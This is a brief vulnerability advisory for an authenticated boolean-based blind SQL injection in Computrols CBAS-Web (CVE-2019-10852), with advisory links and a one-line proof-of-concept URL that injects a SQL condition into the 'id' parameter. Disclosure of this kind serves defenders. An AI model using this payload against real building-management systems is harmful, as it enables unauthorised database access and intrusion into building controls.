Share
Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection  
  
Affected versions: 19.0.0 and below  
CVE: CVE-2019-10852  
Advisory: https://applied-risk.com/resources/ar-2019-009  
Paper: https://applied-risk.com/resources/i-own-your-building-management-system  
  
by Gjoko 'LiquidWorm' Krstic  
  
PoC (id param):  
  
http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510